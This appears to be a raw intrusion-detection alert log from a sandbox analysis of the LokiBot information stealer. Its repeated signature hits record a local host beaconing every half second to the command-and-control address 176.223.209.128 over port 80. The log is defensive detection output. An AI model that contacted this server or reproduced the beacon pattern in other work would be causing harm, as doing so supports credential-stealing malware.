                                              11/25/21-10:51:44.645263TCP2025381ET TROJAN LokiBot Checkin5026580192.168.11.20176.223.209.128
                                              11/25/21-10:51:44.645263TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25026580192.168.11.20176.223.209.128
                                              11/25/21-10:51:45.106868TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15026680192.168.11.20176.223.209.128
                                              11/25/21-10:51:45.106868TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5026680192.168.11.20176.223.209.128
                                              11/25/21-10:51:45.106868TCP2025381ET TROJAN LokiBot Checkin5026680192.168.11.20176.223.209.128
                                              11/25/21-10:51:45.106868TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25026680192.168.11.20176.223.209.128
                                              11/25/21-10:51:45.594589TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15026780192.168.11.20176.223.209.128
                                              11/25/21-10:51:45.594589TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5026780192.168.11.20176.223.209.128
                                              11/25/21-10:51:45.594589TCP2025381ET TROJAN LokiBot Checkin5026780192.168.11.20176.223.209.128
                                              11/25/21-10:51:45.594589TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25026780192.168.11.20176.223.209.128
                                              11/25/21-10:51:46.101808TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15026880192.168.11.20176.223.209.128
                                              11/25/21-10:51:46.101808TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5026880192.168.11.20176.223.209.128
                                              11/25/21-10:51:46.101808TCP2025381ET TROJAN LokiBot Checkin5026880192.168.11.20176.223.209.128
                                              11/25/21-10:51:46.101808TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25026880192.168.11.20176.223.209.128
                                              11/25/21-10:51:46.597646TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15026980192.168.11.20176.223.209.128
                                              11/25/21-10:51:46.597646TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5026980192.168.11.20176.223.209.128
                                              11/25/21-10:51:46.597646TCP2025381ET TROJAN LokiBot Checkin5026980192.168.11.20176.223.209.128
                                              11/25/21-10:51:46.597646TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25026980192.168.11.20176.223.209.128
                                              11/25/21-10:51:47.109619TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15027080192.168.11.20176.223.209.128
                                              11/25/21-10:51:47.109619TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5027080192.168.11.20176.223.209.128
                                              11/25/21-10:51:47.109619TCP2025381ET TROJAN LokiBot Checkin5027080192.168.11.20176.223.209.128
                                              11/25/21-10:51:47.109619TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25027080192.168.11.20176.223.209.128
                                              11/25/21-10:51:47.611890TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15027180192.168.11.20176.223.209.128
                                              11/25/21-10:51:47.611890TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5027180192.168.11.20176.223.209.128
                                              11/25/21-10:51:47.611890TCP2025381ET TROJAN LokiBot Checkin5027180192.168.11.20176.223.209.128
                                              11/25/21-10:51:47.611890TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25027180192.168.11.20176.223.209.128
                                              11/25/21-10:51:48.126751TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15027280192.168.11.20176.223.209.128
                                              11/25/21-10:51:48.126751TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5027280192.168.11.20176.223.209.128
                                              11/25/21-10:51:48.126751TCP2025381ET TROJAN LokiBot Checkin5027280192.168.11.20176.223.209.128
                                              11/25/21-10:51:48.126751TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25027280192.168.11.20176.223.209.128
                                              11/25/21-10:51:48.626427TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15027380192.168.11.20176.223.209.128
                                              11/25/21-10:51:48.626427TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5027380192.168.11.20176.223.209.128
                                              11/25/21-10:51:48.626427TCP2025381ET TROJAN LokiBot Checkin5027380192.168.11.20176.223.209.128
                                              11/25/21-10:51:48.626427TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25027380192.168.11.20176.223.209.128
                                              11/25/21-10:51:49.081962TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15027480192.168.11.20176.223.209.128
                                              11/25/21-10:51:49.081962TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5027480192.168.11.20176.223.209.128
                                              11/25/21-10:51:49.081962TCP2025381ET TROJAN LokiBot Checkin5027480192.168.11.20176.223.209.128
                                              11/25/21-10:51:49.081962TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25027480192.168.11.20176.223.209.128
                                              11/25/21-10:51:49.567233TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15027580192.168.11.20176.223.209.128
                                              11/25/21-10:51:49.567233TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5027580192.168.11.20176.223.209.128
                                              11/25/21-10:51:49.567233TCP2025381ET TROJAN LokiBot Checkin5027580192.168.11.20176.223.209.128
                                              11/25/21-10:51:49.567233TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25027580192.168.11.20176.223.209.128
                                              11/25/21-10:51:50.073434TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15027680192.168.11.20176.223.209.128
                                              11/25/21-10:51:50.073434TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5027680192.168.11.20176.223.209.128
                                              11/25/21-10:51:50.073434TCP2025381ET TROJAN LokiBot Checkin5027680192.168.11.20176.223.209.128
                                              11/25/21-10:51:50.073434TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25027680192.168.11.20176.223.209.128
                                              11/25/21-10:51:50.587694TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15027780192.168.11.20176.223.209.128
                                              11/25/21-10:51:50.587694TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5027780192.168.11.20176.223.209.128
                                              11/25/21-10:51:50.587694TCP2025381ET TROJAN LokiBot Checkin5027780192.168.11.20176.223.209.128
                                              11/25/21-10:51:50.587694TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25027780192.168.11.20176.223.209.128
                                              11/25/21-10:51:51.089071TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15027880192.168.11.20176.223.209.128
                                              11/25/21-10:51:51.089071TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5027880192.168.11.20176.223.209.128
                                              11/25/21-10:51:51.089071TCP2025381ET TROJAN LokiBot Checkin5027880192.168.11.20176.223.209.128
                                              11/25/21-10:51:51.089071TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25027880192.168.11.20176.223.209.128
                                              11/25/21-10:51:51.558423TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15027980192.168.11.20176.223.209.128
                                              11/25/21-10:51:51.558423TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5027980192.168.11.20176.223.209.128
                                              11/25/21-10:51:51.558423TCP2025381ET TROJAN LokiBot Checkin5027980192.168.11.20176.223.209.128
                                              11/25/21-10:51:51.558423TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25027980192.168.11.20176.223.209.128
                                              11/25/21-10:51:52.059238TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15028080192.168.11.20176.223.209.128
                                              11/25/21-10:51:52.059238TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5028080192.168.11.20176.223.209.128
                                              11/25/21-10:51:52.059238TCP2025381ET TROJAN LokiBot Checkin5028080192.168.11.20176.223.209.128
                                              11/25/21-10:51:52.059238TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25028080192.168.11.20176.223.209.128
                                              11/25/21-10:51:52.528089TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15028180192.168.11.20176.223.209.128
                                              11/25/21-10:51:52.528089TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5028180192.168.11.20176.223.209.128
                                              11/25/21-10:51:52.528089TCP2025381ET TROJAN LokiBot Checkin5028180192.168.11.20176.223.209.128
                                              11/25/21-10:51:52.528089TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25028180192.168.11.20176.223.209.128
                                              11/25/21-10:51:53.007933TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15028280192.168.11.20176.223.209.128
                                              11/25/21-10:51:53.007933TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5028280192.168.11.20176.223.209.128
                                              11/25/21-10:51:53.007933TCP2025381ET TROJAN LokiBot Checkin5028280192.168.11.20176.223.209.128
                                              11/25/21-10:51:53.007933TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25028280192.168.11.20176.223.209.128
                                              11/25/21-10:51:53.539837TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15028380192.168.11.20176.223.209.128
                                              11/25/21-10:51:53.539837TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5028380192.168.11.20176.223.209.128
                                              11/25/21-10:51:53.539837TCP2025381ET TROJAN LokiBot Checkin5028380192.168.11.20176.223.209.128
                                              11/25/21-10:51:53.539837TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25028380192.168.11.20176.223.209.128
                                              11/25/21-10:51:54.048854TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15028480192.168.11.20176.223.209.128
                                              11/25/21-10:51:54.048854TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5028480192.168.11.20176.223.209.128
                                              11/25/21-10:51:54.048854TCP2025381ET TROJAN LokiBot Checkin5028480192.168.11.20176.223.209.128
                                              11/25/21-10:51:54.048854TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25028480192.168.11.20176.223.209.128
                                              11/25/21-10:51:54.571504TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15028580192.168.11.20176.223.209.128
                                              11/25/21-10:51:54.571504TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5028580192.168.11.20176.223.209.128
                                              11/25/21-10:51:54.571504TCP2025381ET TROJAN LokiBot Checkin5028580192.168.11.20176.223.209.128
                                              11/25/21-10:51:54.571504TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25028580192.168.11.20176.223.209.128
                                              11/25/21-10:51:55.074582TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15028680192.168.11.20176.223.209.128
                                              11/25/21-10:51:55.074582TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5028680192.168.11.20176.223.209.128
                                              11/25/21-10:51:55.074582TCP2025381ET TROJAN LokiBot Checkin5028680192.168.11.20176.223.209.128
                                              11/25/21-10:51:55.074582TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25028680192.168.11.20176.223.209.128
                                              11/25/21-10:51:55.507302TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15028780192.168.11.20176.223.209.128
                                              11/25/21-10:51:55.507302TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5028780192.168.11.20176.223.209.128
                                              11/25/21-10:51:55.507302TCP2025381ET TROJAN LokiBot Checkin5028780192.168.11.20176.223.209.128
                                              11/25/21-10:51:55.507302TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25028780192.168.11.20176.223.209.128
                                              11/25/21-10:51:56.038112TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15028880192.168.11.20176.223.209.128
                                              11/25/21-10:51:56.038112TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5028880192.168.11.20176.223.209.128
                                              11/25/21-10:51:56.038112TCP2025381ET TROJAN LokiBot Checkin5028880192.168.11.20176.223.209.128
                                              11/25/21-10:51:56.038112TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25028880192.168.11.20176.223.209.128
                                              11/25/21-10:51:56.542012TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15028980192.168.11.20176.223.209.128
                                              11/25/21-10:51:56.542012TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5028980192.168.11.20176.223.209.128
                                              11/25/21-10:51:56.542012TCP2025381ET TROJAN LokiBot Checkin5028980192.168.11.20176.223.209.128
                                              11/25/21-10:51:56.542012TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25028980192.168.11.20176.223.209.128
                                              11/25/21-10:51:57.052498TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15029080192.168.11.20176.223.209.128
                                              11/25/21-10:51:57.052498TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5029080192.168.11.20176.223.209.128
                                              11/25/21-10:51:57.052498TCP2025381ET TROJAN LokiBot Checkin5029080192.168.11.20176.223.209.128
                                              11/25/21-10:51:57.052498TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25029080192.168.11.20176.223.209.128
                                              11/25/21-10:51:57.572349TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15029180192.168.11.20176.223.209.128
                                              11/25/21-10:51:57.572349TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5029180192.168.11.20176.223.209.128
                                              11/25/21-10:51:57.572349TCP2025381ET TROJAN LokiBot Checkin5029180192.168.11.20176.223.209.128
                                              11/25/21-10:51:57.572349TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25029180192.168.11.20176.223.209.128
                                              11/25/21-10:51:58.081695TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15029280192.168.11.20176.223.209.128
                                              11/25/21-10:51:58.081695TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5029280192.168.11.20176.223.209.128
                                              11/25/21-10:51:58.081695TCP2025381ET TROJAN LokiBot Checkin5029280192.168.11.20176.223.209.128
                                              11/25/21-10:51:58.081695TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25029280192.168.11.20176.223.209.128
                                              11/25/21-10:51:58.603737TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15029380192.168.11.20176.223.209.128
                                              11/25/21-10:51:58.603737TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5029380192.168.11.20176.223.209.128
                                              11/25/21-10:51:58.603737TCP2025381ET TROJAN LokiBot Checkin5029380192.168.11.20176.223.209.128
                                              11/25/21-10:51:58.603737TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25029380192.168.11.20176.223.209.128
                                              11/25/21-10:51:59.123735TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15029480192.168.11.20176.223.209.128
                                              11/25/21-10:51:59.123735TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5029480192.168.11.20176.223.209.128
                                              11/25/21-10:51:59.123735TCP2025381ET TROJAN LokiBot Checkin5029480192.168.11.20176.223.209.128
                                              11/25/21-10:51:59.123735TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25029480192.168.11.20176.223.209.128
                                              11/25/21-10:51:59.583120TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15029580192.168.11.20176.223.209.128
                                              11/25/21-10:51:59.583120TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5029580192.168.11.20176.223.209.128
                                              11/25/21-10:51:59.583120TCP2025381ET TROJAN LokiBot Checkin5029580192.168.11.20176.223.209.128
                                              11/25/21-10:51:59.583120TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25029580192.168.11.20176.223.209.128
                                              11/25/21-10:52:00.084926TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15029680192.168.11.20176.223.209.128
                                              11/25/21-10:52:00.084926TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5029680192.168.11.20176.223.209.128
                                              11/25/21-10:52:00.084926TCP2025381ET TROJAN LokiBot Checkin5029680192.168.11.20176.223.209.128
                                              11/25/21-10:52:00.084926TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25029680192.168.11.20176.223.209.128
                                              11/25/21-10:52:00.618989TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15029780192.168.11.20176.223.209.128
                                              11/25/21-10:52:00.618989TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5029780192.168.11.20176.223.209.128
                                              11/25/21-10:52:00.618989TCP2025381ET TROJAN LokiBot Checkin5029780192.168.11.20176.223.209.128
                                              11/25/21-10:52:00.618989TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25029780192.168.11.20176.223.209.128
                                              11/25/21-10:52:01.143885TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15029880192.168.11.20176.223.209.128
                                              11/25/21-10:52:01.143885TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5029880192.168.11.20176.223.209.128
                                              11/25/21-10:52:01.143885TCP2025381ET TROJAN LokiBot Checkin5029880192.168.11.20176.223.209.128
                                              11/25/21-10:52:01.143885TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25029880192.168.11.20176.223.209.128
                                              11/25/21-10:52:01.658061TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15029980192.168.11.20176.223.209.128
                                              11/25/21-10:52:01.658061TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5029980192.168.11.20176.223.209.128
                                              11/25/21-10:52:01.658061TCP2025381ET TROJAN LokiBot Checkin5029980192.168.11.20176.223.209.128
                                              11/25/21-10:52:01.658061TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25029980192.168.11.20176.223.209.128
                                              11/25/21-10:52:02.188969TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15030080192.168.11.20176.223.209.128
                                              11/25/21-10:52:02.188969TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5030080192.168.11.20176.223.209.128
                                              11/25/21-10:52:02.188969TCP2025381ET TROJAN LokiBot Checkin5030080192.168.11.20176.223.209.128
                                              11/25/21-10:52:02.188969TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25030080192.168.11.20176.223.209.128
                                              11/25/21-10:52:02.707521TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15030180192.168.11.20176.223.209.128
                                              11/25/21-10:52:02.707521TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5030180192.168.11.20176.223.209.128
                                              11/25/21-10:52:02.707521TCP2025381ET TROJAN LokiBot Checkin5030180192.168.11.20176.223.209.128
                                              11/25/21-10:52:02.707521TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25030180192.168.11.20176.223.209.128
                                              11/25/21-10:52:03.225980TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15030280192.168.11.20176.223.209.128
                                              11/25/21-10:52:03.225980TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5030280192.168.11.20176.223.209.128
                                              11/25/21-10:52:03.225980TCP2025381ET TROJAN LokiBot Checkin5030280192.168.11.20176.223.209.128
                                              11/25/21-10:52:03.225980TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25030280192.168.11.20176.223.209.128
                                              11/25/21-10:52:03.735458TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15030380192.168.11.20176.223.209.128
                                              11/25/21-10:52:03.735458TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5030380192.168.11.20176.223.209.128
                                              11/25/21-10:52:03.735458TCP2025381ET TROJAN LokiBot Checkin5030380192.168.11.20176.223.209.128
                                              11/25/21-10:52:03.735458TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25030380192.168.11.20176.223.209.128
                                              11/25/21-10:52:04.214606TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15030480192.168.11.20176.223.209.128
                                              11/25/21-10:52:04.214606TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5030480192.168.11.20176.223.209.128
                                              11/25/21-10:52:04.214606TCP2025381ET TROJAN LokiBot Checkin5030480192.168.11.20176.223.209.128
                                              11/25/21-10:52:04.214606TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25030480192.168.11.20176.223.209.128
                                              11/25/21-10:52:04.684538TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15030580192.168.11.20176.223.209.128
                                              11/25/21-10:52:04.684538TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5030580192.168.11.20176.223.209.128
                                              11/25/21-10:52:04.684538TCP2025381ET TROJAN LokiBot Checkin5030580192.168.11.20176.223.209.128
                                              11/25/21-10:52:04.684538TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25030580192.168.11.20176.223.209.128
                                              11/25/21-10:52:05.176481TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15030680192.168.11.20176.223.209.128
                                              11/25/21-10:52:05.176481TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5030680192.168.11.20176.223.209.128
                                              11/25/21-10:52:05.176481TCP2025381ET TROJAN LokiBot Checkin5030680192.168.11.20176.223.209.128
                                              11/25/21-10:52:05.176481TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25030680192.168.11.20176.223.209.128
                                              11/25/21-10:52:05.687914TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15030780192.168.11.20176.223.209.128
                                              11/25/21-10:52:05.687914TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5030780192.168.11.20176.223.209.128
                                              11/25/21-10:52:05.687914TCP2025381ET TROJAN LokiBot Checkin5030780192.168.11.20176.223.209.128
                                              11/25/21-10:52:05.687914TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25030780192.168.11.20176.223.209.128
                                              11/25/21-10:52:06.226743TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15030880192.168.11.20176.223.209.128
                                              11/25/21-10:52:06.226743TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5030880192.168.11.20176.223.209.128
                                              11/25/21-10:52:06.226743TCP2025381ET TROJAN LokiBot Checkin5030880192.168.11.20176.223.209.128
                                              11/25/21-10:52:06.226743TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25030880192.168.11.20176.223.209.128
                                              11/25/21-10:52:06.742992TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15030980192.168.11.20176.223.209.128
                                              11/25/21-10:52:06.742992TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5030980192.168.11.20176.223.209.128
                                              11/25/21-10:52:06.742992TCP2025381ET TROJAN LokiBot Checkin5030980192.168.11.20176.223.209.128
                                              11/25/21-10:52:06.742992TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25030980192.168.11.20176.223.209.128
                                              11/25/21-10:52:07.216253TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15031080192.168.11.20176.223.209.128
                                              11/25/21-10:52:07.216253TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5031080192.168.11.20176.223.209.128
                                              11/25/21-10:52:07.216253TCP2025381ET TROJAN LokiBot Checkin5031080192.168.11.20176.223.209.128
                                              11/25/21-10:52:07.216253TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25031080192.168.11.20176.223.209.128
                                              11/25/21-10:52:07.736750TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15031180192.168.11.20176.223.209.128
                                              11/25/21-10:52:07.736750TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5031180192.168.11.20176.223.209.128
                                              11/25/21-10:52:07.736750TCP2025381ET TROJAN LokiBot Checkin5031180192.168.11.20176.223.209.128
                                              11/25/21-10:52:07.736750TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25031180192.168.11.20176.223.209.128
                                              11/25/21-10:52:08.228884TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15031280192.168.11.20176.223.209.128
                                              11/25/21-10:52:08.228884TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5031280192.168.11.20176.223.209.128
                                              11/25/21-10:52:08.228884TCP2025381ET TROJAN LokiBot Checkin5031280192.168.11.20176.223.209.128
                                              11/25/21-10:52:08.228884TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25031280192.168.11.20176.223.209.128
                                              11/25/21-10:52:08.719767TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15031380192.168.11.20176.223.209.128
                                              11/25/21-10:52:08.719767TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5031380192.168.11.20176.223.209.128
                                              11/25/21-10:52:08.719767TCP2025381ET TROJAN LokiBot Checkin5031380192.168.11.20176.223.209.128
                                              11/25/21-10:52:08.719767TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25031380192.168.11.20176.223.209.128
                                              11/25/21-10:52:09.223409TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15031480192.168.11.20176.223.209.128
                                              11/25/21-10:52:09.223409TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5031480192.168.11.20176.223.209.128
                                              11/25/21-10:52:09.223409TCP2025381ET TROJAN LokiBot Checkin5031480192.168.11.20176.223.209.128
                                              11/25/21-10:52:09.223409TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25031480192.168.11.20176.223.209.128
                                              11/25/21-10:52:09.728246TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15031580192.168.11.20176.223.209.128
                                              11/25/21-10:52:09.728246TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5031580192.168.11.20176.223.209.128
                                              11/25/21-10:52:09.728246TCP2025381ET TROJAN LokiBot Checkin5031580192.168.11.20176.223.209.128
                                              11/25/21-10:52:09.728246TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25031580192.168.11.20176.223.209.128
                                              11/25/21-10:52:10.154549TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15031680192.168.11.20176.223.209.128
                                              11/25/21-10:52:10.154549TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5031680192.168.11.20176.223.209.128
                                              11/25/21-10:52:10.154549TCP2025381ET TROJAN LokiBot Checkin5031680192.168.11.20176.223.209.128
                                              11/25/21-10:52:10.154549TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25031680192.168.11.20176.223.209.128
                                              11/25/21-10:52:10.673271TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15031780192.168.11.20176.223.209.128
                                              11/25/21-10:52:10.673271TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5031780192.168.11.20176.223.209.128
                                              11/25/21-10:52:10.673271TCP2025381ET TROJAN LokiBot Checkin5031780192.168.11.20176.223.209.128
                                              11/25/21-10:52:10.673271TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25031780192.168.11.20176.223.209.128
                                              11/25/21-10:52:11.194120TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15031880192.168.11.20176.223.209.128
                                              11/25/21-10:52:11.194120TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5031880192.168.11.20176.223.209.128
                                              11/25/21-10:52:11.194120TCP2025381ET TROJAN LokiBot Checkin5031880192.168.11.20176.223.209.128
                                              11/25/21-10:52:11.194120TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25031880192.168.11.20176.223.209.128
                                              11/25/21-10:52:11.717969TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15031980192.168.11.20176.223.209.128
                                              11/25/21-10:52:11.717969TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5031980192.168.11.20176.223.209.128
                                              11/25/21-10:52:11.717969TCP2025381ET TROJAN LokiBot Checkin5031980192.168.11.20176.223.209.128
                                              11/25/21-10:52:11.717969TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25031980192.168.11.20176.223.209.128
                                              11/25/21-10:52:12.234683TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15032080192.168.11.20176.223.209.128
                                              11/25/21-10:52:12.234683TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5032080192.168.11.20176.223.209.128
                                              11/25/21-10:52:12.234683TCP2025381ET TROJAN LokiBot Checkin5032080192.168.11.20176.223.209.128
                                              11/25/21-10:52:12.234683TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25032080192.168.11.20176.223.209.128
                                              11/25/21-10:52:12.694839TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15032180192.168.11.20176.223.209.128
                                              11/25/21-10:52:12.694839TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5032180192.168.11.20176.223.209.128
                                              11/25/21-10:52:12.694839TCP2025381ET TROJAN LokiBot Checkin5032180192.168.11.20176.223.209.128
                                              11/25/21-10:52:12.694839TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25032180192.168.11.20176.223.209.128
                                              11/25/21-10:52:13.182188TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15032280192.168.11.20176.223.209.128
                                              11/25/21-10:52:13.182188TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5032280192.168.11.20176.223.209.128
                                              11/25/21-10:52:13.182188TCP2025381ET TROJAN LokiBot Checkin5032280192.168.11.20176.223.209.128
                                              11/25/21-10:52:13.182188TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25032280192.168.11.20176.223.209.128
                                              11/25/21-10:52:13.677236TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15032380192.168.11.20176.223.209.128
                                              11/25/21-10:52:13.677236TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5032380192.168.11.20176.223.209.128
                                              11/25/21-10:52:13.677236TCP2025381ET TROJAN LokiBot Checkin5032380192.168.11.20176.223.209.128
